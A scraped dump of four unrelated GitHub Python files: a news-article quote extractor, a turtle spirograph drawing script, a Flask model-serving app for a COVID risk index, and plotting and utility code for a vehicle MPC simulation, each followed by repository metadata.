#print str(quoteStart)+" - " +str(lastBegin)+" // "+ str(hadQ)
if quoteStart-lastBegin<2 and hadQ:
mightMer=True
elif wasQ:
mightMer=True
mergeC=True
elif c==u'\u201c': #unicode quote begin
inQuote=True
quoteStart=i
#print str(quoteStart)+" - " +str(lastBegin)+" // "+ str(hadQ)
if quoteStart-lastBegin<2 and hadQ:
mightMer=True
elif wasQ:
mightMer=True
mergeC=True
elif c==u'\u201d': # unicode quote end
q= text[quoteStart:i+1]
#print str(quoteStart)+ " - ascii end"
inQuote=False
if spaceQ>3: # quote has 4 or more words
if mightMer:
place=len(quotes)+len(allQuotes)
merge.append(place)
if mergeC:
mergeComma.append(place)
quotes.append(q)
spaceQ=0
if not (nextBegin>i):
wasQ=True
mightMer=False
mergeC=False
elif ord(c)>64 and ord(c)<91: # CAPITOL LETTER
lastCap = i
if capC==0:
properStart=i
capC+=1
elif i-lastSpace<=1:
if capC>1:
proper.append(text[properStart:i-1])
capC=0
#pp.pprint(quotes)
if len(quotes)>=1:
allQuotes+=quotes
if len(sentences)>=1:
allSen+=sentences
#pp.pprint(sentences)
#print merge
for i in merge: #merge is a list of indecies where the qutoe at i must merge witht he one at i-1
q1=allQuotes[i-1]
q2=allQuotes[i]
punc=q1[len(q1)-2]
q1=q1[:len(q1)-2]
if punc == "," and i not in mergeComma: #in the case "quote, " i said, "end of quote." / the comma shouldnt be replaced
punc= "."
qFin= q1 +punc+ " "+ q2[1:]
allQuotes[i-1]=qFin
mod=0
for i in merge:
allQuotes.pop(i+mod)
mod-=1
properU=[]
for line in proper:
if line not in properU:
properU.append(line) # a list of unique proper names, unused for now
tempQuotes= []
for quote in allQuotes:
ascii=ord(quote[1])
if ascii>64 and ascii<91:
i=len(quote)-1
while quote[i] in punctuation:
i-=1
#i+=1
if quote[i]==",":
quote= quote[:i]+"."+quote[i+1:]
tempQuotes.append(quote)
allQuotes=tempQuotes
"""
blockQuote= soup.find_all(attrs={ "class" : "pullquote" }) # pull block quotes -----NOT WORKING-----
for line in blockQuote:
allQuotes.push(line.get_text())
"""
""""
Errors with this algorithm:
-If you use a while loop it will exit as soon as you find one quote that
doesnt meet your criteria, and you wont check all quotes.
Also I think you have the lengths backward; should be ...<180 and ... >80.
if len(allQuotes)>0:
while len(allQuotes[0])>180: #max quote size
allQuotes=allQuotes[1:]
allQuotes.reverse()
while len(allQuotes[0])<80: # min quote size
allQuotes=allQuotes[1:]
allQuotes.reverse()"""
numQuotes=6
goodSen=[]
blocks=[]
blockQuote= soup.find_all('blockquote') # pull block quotes
for line in blockQuote:
if 'tweet' not in str(line.get('class')).lower():
blocks.append(line.get_text())
#pp.pprint(blocks)
blocks= trim(blocks, 165,80)
blocks.sort(key= lambda q:score(q), reverse=True)
remain =numQuotes-len(blocks)
if remain<=0:
goodSen= blocks[:numQuotes]
else:
goodSen+= blocks
#print goodSen
#print allQuotes
allQuotes= trim(allQuotes,165, 80)
allQuotes.sort(key= lambda q:score(q), reverse=True)
for q in allQuotes:
if q not in goodSen and len(goodSen)< numQuotes:
goodSen.append(q)
remain2= numQuotes- len(goodSen)
#print goodSen
#print remain2
if remain2<=0:
#goodSen+= allQuotes[:remain]
do=0
else:
#goodSen+= allQuotes
#
# Future Pan: Make it able to combine sentences instead of trimming...
#
#print allSen
allSen = trim(allSen,165,80)
allSen.sort(key= lambda q:score(q), reverse=True)
#print allSen
for s in allSen:
if s not in goodSen:
goodSen.append(s)
if len(goodSen) >= numQuotes:
break
#for i in range(len(allQuotes)):
# q=allQuotes[i]
# q+=str(len(q))
# allQuotes[i]=q
#pp.pprint(properU)
origin=multiSplit(argv)
if 'com' in origin: #find the hostname of the website
source= origin[origin.index('com')-1]
images= []
# old image finding code, to be updated
stri=""
for i in img:
stri=i.get('src')
#print(str)
pieces= multiSplit(stri)
#if source in pieces and 'logo' not in pieces and 'png' not in pieces and 'gif' not in pieces and stri != None:
if 'logo' not in pieces and 'png' not in pieces and 'gif' not in pieces and stri != None and stri[:3] == 'htt': #filter by source string
#pp.pprint(stri)
fileSize, dims=getsizes(stri)
if dims==None:
continue
width, height= dims
#w, h =jpeg_res(stri)
if width>200 and height>200: # filter by image size
good=True
for p in i.parents: # filtering by the parents of the image
i = str(p.get('id'))
c= str(p.get('class'))
d= str(p.get('data-content-kicker'))
if 'related' in i:
good=False
break
elif 'wide-thumb' in c:
good= False
break
elif 'google_' in i:
good= False
break
elif 'moat_trackable' in c:
good= False
break
elif 'Related' in d:
good= False
break
elif 'extra' in c:
good= False
break
if good:
images.append(stri)
#pp.pprint(str(w)+ "/"+str(H)+ " - "+ stri)
#pp.pprint(source)
#pp.pprint(images)
content=''
for i in img2:
prop=i.get('property')
if prop=="og:image":
content= i.get('content') # supposed to be a guarenteed good image for every article 'technically'
break
heads = soup.find_all('h1')
head = ''
if heads!=[]:
for h in heads:
#print h;
if "logo" not in str(h.get('class')):
head = h.get_text()
break
#pp.pprint(head)
return goodSen,content, images, head
def score(s):
score=0
j=s.lower()
for p in punctuation:
j=j.replace(p, ' ')
l=j.split()
for w in l:
if w in repository.emotive:
score+=2
if w in repository.personal:
score+=3
for w in repository.proper:
if w in j:
score+=1
for w in repository.phrase:
if w in j:
score+=1
score+= s.count('\"')
score+= s.count(u"\u201C")
score+= s.count(u"\u201D")
return score
def trim(sentences, max, min):
tempQuotes = []
if len(sentences)>0:
for quote in sentences:
length = len(quote);
if length >min and length <max:
tempQuotes.append(quote)
return tempQuotes
def multiSplit(string):
if not string:
return []
seperated= string.replace('/',' ').replace('.', ' ').replace('_', ' ').replace('&', ' ').split()
return seperated
import urllib
from PIL import ImageFile
def getsizes(uri):
# get file size *and* image size (None if not known)
file = urllib.urlopen(uri)
size = file.headers.get("content-length")
if size: size = int(size)
p = ImageFile.Parser()
while 1:
data = file.read(1024)
if not data:
break
p.feed(data)
if p.image:
return size, p.image.size
break
file.close()
return size, None
#parse('http://www.huffingtonpost.com/entry/david-cameron-dodgy_us_570bf446e4b0885fb50dc004')
#parse('http://www.huffingtonpost.com/entry/ted-cruz-gold-standard-republican_us_571196bfe4b06f35cb6fbac6?cps=gravity_2425_-8385480002285021224')
#parse('http://www.theblaze.com/stories/2016/04/12/trump-blasts-rnc-chairman-reince-priebus-should-be-ashamed-of-himself/') | NUKnightLab/piquote | quote.py | quote.py | py | 13,487 | python | en | code | 3 | github-code | 13 |
41047993355 | from turtle import *
from random import *
def random_color():
r = randint(0, 255)
g = randint(0, 255)
b = randint(0, 255)
color = (r, g, b)
return color
def draw_spirograph(turtle, size_of_gap, r):
for i in range(int(360 / size_of_gap)):
tim.color(random_color())
tim.circle(r)
tim.setheading(tim.heading() + size_of_gap)
tim = Turtle()
colormode(255)
tim.speed(0)
tim.pensize(2)
draw_spirograph(tim, 5, 100)
my_screen = Screen()
my_screen.exitonclick() | codeBeaver2002/circleDraw | main.py | main.py | py | 510 | python | en | code | 0 | github-code | 13 |
23046903209 | import tempfile
import time
import pandas as pd
import numpy as np
from pkg_resources import resource_filename
from flask import Flask, make_response, request, abort
from .predict import do_run
from .io import read_model
def create_model_app(model_fpath, schema_fpath, **kwargs):
model = read_model(model_fpath)
app = Flask(__name__)
@app.route("/ping", methods=("GET",))
def ping():
return make_response("")
@app.route("/invocations", methods=("POST",))
def invocations():
start = time.time()
with tempfile.NamedTemporaryFile(suffix=".csv") as input_fobj:
input_fpath = input_fobj.name
input_fobj.write(request.data)
input_fobj.seek(0)
with tempfile.NamedTemporaryFile(suffix=".csv") as output_fobj:
output_fpath = output_fobj.name
try:
do_run(input_fpath, schema_fpath, model_fpath, output_fpath)
except Exception as e:
abort(400, f"Error parsing payload: {e}")
output_fobj.seek(0)
results = output_fobj.read()
response = make_response(results)
response.mimetyhpe = "text/csv"
return response
return app
def sagemaker_serve():
app = create_model_app(
resource_filename("cv19index", "resources/xgboost/model.pickle"),
resource_filename("cv19index", "resources/xgboost/input.csv.schema.json"),
)
app.run("0.0.0.0", 8080, debug=False)
| closedloop-ai/cv19index | cv19index/server.py | server.py | py | 1,545 | python | en | code | 90 | github-code | 13 |
15629333223 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from matplotlib.ticker import MaxNLocator
import imageio
import os
# --- Iterative-MPC / simulation parameters ---
MAX_ITER = 3  # maximum refinement iterations per control step
DU_TH = 0.1  # stop iterating once the control-input change drops below this
GOAL_DIS_X = 1.0  # [m] x tolerance for declaring the goal reached
GOAL_DIS_Y = 1.0  # [m] y tolerance for declaring the goal reached
STOP_SPEED = 2.0  # [m/s] speed threshold treated as "stopped" — TODO confirm where used
MAX_TIME = 500.0  # [s] maximum simulation time
TARGET_SPEED = 15.0  # [m/s] target speed
N_IND_SEARCH = 20  # number of path indices searched for the nearest point
DESIRED_Y = -5.0  # [m] desired lateral position — presumably lane offset; verify against caller
DESIRED_X = 1000.0  # [m] desired longitudinal goal position
DT = 0.1  # [s] time tick

# Vehicle geometry parameters (used by plot_car)
LENGTH = 4.4  # [m] overall body length
WIDTH = 1.9  # [m] overall body width
BACKTOWHEEL = 0.9  # [m] distance from rear bumper to rear axle
WHEEL_LEN = 0.3  # [m] half wheel length (drawn rectangle)
WHEEL_WIDTH = 0.2  # [m] half wheel width (drawn rectangle)
TREAD = 0.7  # [m] lateral offset from centerline to each wheel
WB = 1.9  # [m] wheelbase (rear axle to front axle)
def plot_car(x, y, yaw, steer=0.0, cabcolor="-r", truckcolor="-k"):
    """Draw the car body outline and four wheels on the current matplotlib axes.

    Args:
        x, y: Vehicle reference position (rear axle) in world frame [m].
        yaw: Vehicle heading [rad].
        steer: Front-wheel steering angle [rad].
        cabcolor: Kept for API compatibility; not used by the drawing code.
        truckcolor: Matplotlib format string used for body and wheels.
    """
    # Shapes are 2 x N point sets in the vehicle frame.  The original used the
    # deprecated np.matrix; plain ndarrays with '@' matmul behave identically.
    outline = np.array([[-BACKTOWHEEL, (LENGTH - BACKTOWHEEL), (LENGTH - BACKTOWHEEL), -BACKTOWHEEL, -BACKTOWHEEL],
                        [WIDTH / 2, WIDTH / 2, -WIDTH / 2, -WIDTH / 2, WIDTH / 2]])

    fr_wheel = np.array([[WHEEL_LEN, -WHEEL_LEN, -WHEEL_LEN, WHEEL_LEN, WHEEL_LEN],
                         [-WHEEL_WIDTH - TREAD, -WHEEL_WIDTH - TREAD, WHEEL_WIDTH - TREAD, WHEEL_WIDTH - TREAD, -WHEEL_WIDTH - TREAD]])

    rr_wheel = np.copy(fr_wheel)
    fl_wheel = np.copy(fr_wheel)
    fl_wheel[1, :] *= -1  # mirror to the other side of the vehicle
    rl_wheel = np.copy(rr_wheel)
    rl_wheel[1, :] *= -1

    Rot1 = np.array([[math.cos(yaw), math.sin(yaw)],
                     [-math.sin(yaw), math.cos(yaw)]])
    Rot2 = np.array([[math.cos(steer), math.sin(steer)],
                     [-math.sin(steer), math.cos(steer)]])

    # Steering rotation applies to the front wheels only.
    fr_wheel = (fr_wheel.T @ Rot2).T
    fl_wheel = (fl_wheel.T @ Rot2).T
    # Shift the front wheels forward by the wheelbase.
    fr_wheel[0, :] += WB
    fl_wheel[0, :] += WB

    # Rotate everything by the vehicle yaw into the world frame.
    fr_wheel = (fr_wheel.T @ Rot1).T
    fl_wheel = (fl_wheel.T @ Rot1).T
    outline = (outline.T @ Rot1).T
    rr_wheel = (rr_wheel.T @ Rot1).T
    rl_wheel = (rl_wheel.T @ Rot1).T

    # Translate to the vehicle position and draw each part.
    for part in (outline, fr_wheel, rr_wheel, fl_wheel, rl_wheel):
        part[0, :] += x
        part[1, :] += y
        plt.plot(np.array(part[0, :]).flatten(),
                 np.array(part[1, :]).flatten(), truckcolor)
    # plt.plot(x, y, "*")
def check_goal(ugv, desired_x, desired_y):
    """Return True when the vehicle is within the goal tolerance on both axes.

    NOTE(review): the offsets are signed, so a vehicle that has driven past
    the goal (negative dx/dy) also counts as arrived — confirm this is the
    intended semantics before tightening to abs().
    """
    dx = desired_x - ugv.x
    dy = desired_y - ugv.y
    reached_x = dx <= GOAL_DIS_X
    reached_y = dy <= GOAL_DIS_Y
    return reached_x and reached_y
def get_nparray_from_matrix(x):
    """Flatten a matrix/array-like ``x`` into a 1-D numpy array (new copy)."""
    flat = np.asarray(x).flatten()
    return flat
def png_count(addr):
    """Return the number of .png files in *addr*, minus one.

    NOTE(review): the original counter starts at -1, so the result is one
    less than the actual PNG count; animation_generation appears to rely on
    this off-by-one — confirm before "fixing" it.
    """
    entries = os.listdir(addr)
    return sum(1 for entry in entries if entry.endswith(".png")) - 1
def animation_generation(addr,now_time):
    """Assemble the numbered PNG frames in *addr* into an animated GIF.

    The GIF is written as ``addr\\{now_time}.gif`` at 15 fps; frames are
    expected to be named ``0.png``, ``1.png``, ...  Path separators are
    hard-coded as ``\\`` (Windows-only).

    NOTE(review): png_count returns one less than the number of PNGs, so
    range(pic_num) skips the highest-numbered frame — confirm intentional.
    """
    pic_num = png_count(addr)
    with imageio.get_writer(uri=addr+'\\{}.gif'.format(now_time), mode='I', fps=15) as writer:
        for i in range(pic_num):
            writer.append_data(imageio.imread((addr + "\\{}.png").format(i)))
def Fig_delete(addr):
    """Recursively delete every .png file under *addr*, logging each removal."""
    for root, dirs, files in os.walk(addr):
        for name in files:
            if not name.endswith(".png"):
                continue
            os.remove(os.path.join(root, name))
            print("Delete File: " + os.path.join(root, name))
def draw_fig(dirpath, delta_list, variable_name, unit_name):
    """Plot *delta_list* against time (0.1 s samples) and save PNG/SVG copies.

    Args:
        dirpath: Directory the figure files are written into (Windows-style
            ``\\`` separator is hard-coded in the save paths).
        delta_list: Sequence of values sampled every 0.1 s.
        variable_name: y-axis label and output file stem; "delta" and "V"
            get LaTeX-style labels.
        unit_name: Unit string appended to the y-axis label.
    """
    # Time axis: samples are spaced 0.1 s apart (matches DT).
    t_list = 0.1 * np.arange(len(delta_list))

    fig, ax = plt.subplots(figsize=(17, 6))
    plt.gca().yaxis.set_major_locator(MaxNLocator(integer=True))
    font = {'family': 'Times New Roman',
            'size': 13,
            }
    ax.spines['right'].set_visible(False)
    ax.spines['top'].set_visible(False)
    plt.plot(t_list, delta_list, c="orange", linewidth=4.0)
    plt.tick_params(width=0.5, labelsize=20)
    plt.xlabel('Time(s)', fontdict=font, fontsize=26)
    # Raw strings: "\{" was an invalid escape sequence (DeprecationWarning);
    # the raw form keeps the exact same runtime bytes (e.g. "$\delta$").
    if variable_name == "delta":
        plt.ylabel(r'$\{}$ ({})'.format(variable_name, unit_name), fontdict=font, fontsize=24)
    elif variable_name == "V":
        plt.ylabel('${}$ ({})'.format(variable_name, unit_name), fontdict=font, fontsize=24)
    else:
        plt.ylabel('{}'.format(variable_name), fontdict=font, fontsize=24)
    # Removed a dead duplicate plt.legend call; only this one (with loc)
    # ever took effect.
    plt.legend(["Normal Scenario"], loc="upper right")
    plt.rcParams.update({'font.size': 21})
    plt.savefig(dirpath + r"\{}.png".format(variable_name), dpi=600)
    plt.savefig(dirpath + r"\{}.svg".format(variable_name), dpi=600)
    plt.show()
def initial_excel(dir, num1, num2):
    """Create a fresh ``LAS_{num1}_{num2}.xlsx`` workbook in *dir* with one empty column named *num2*."""
    column_name = "{}".format(num2)
    empty_frame = pd.DataFrame({column_name: []})
    target_path = dir + "//LAS_{}_{}.xlsx".format(num1, num2)
    empty_frame.to_excel(target_path)
def save_to_excel(dir, Time_dict, label):
    """Append the last value of *Time_dict* to column *label* of the workbook at *dir*.

    Args:
        dir: Path of the .xlsx file that is read and then rewritten.
        Time_dict: Ordered mapping; only its most recently inserted value
            is persisted.
        label: Column name to append to (e.g. "500" or "800").

    Note:
        The workbook is rewritten with only the *label* column kept,
        mirroring the original behaviour.
    """
    # Only the last value in insertion order is saved.
    value_list = list(Time_dict.values())
    col = "{}".format(label)

    df = pd.read_excel(dir)
    df = df[[col]]
    # Generalized from a hard-coded "500"/"800" if/elif chain: append the
    # value to whatever column *label* names (identical for "500"/"800").
    df.loc[len(df), col] = value_list[-1]
    df.to_excel(dir)
| YimingShu-teay/Safety-critical-Decision-making-and-Control | code/utils.py | utils.py | py | 5,597 | python | en | code | 2 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.